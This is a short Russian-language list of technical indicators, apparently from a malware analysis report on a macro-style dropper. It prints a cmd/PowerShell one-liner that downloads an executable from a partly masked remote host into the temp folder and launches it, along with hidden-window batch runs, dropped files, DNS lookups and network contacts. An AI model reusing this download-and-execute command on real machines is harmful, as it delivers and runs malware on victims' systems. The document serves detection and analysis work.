Техническая информация
- $lnk как %temp%\kticks.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function load([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\Kticks.exe'');Start-Process ''%TMP%\Kticks.exe'';}try{load(''http://pi####s...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1167183.cvr
- %TEMP%\whsjd.bat
- 'pi####svalencia.com':80
- 'ri###rbos.info':80
- 'ri###rbos.info':443
- http://pi####svalencia.com/grazlocksa36.png
- http://ri###rbos.info/grazlocksa36.png
- 'ri###rbos.info':443
- DNS ASK pi####svalencia.com
- DNS ASK ri###rbos.info
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function load([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\Kticks.exe'');Start-Process ''%TMP%\Kticks.exe'';}try{load(''http://pi####s...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\whsjd.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\whsjd.bat" "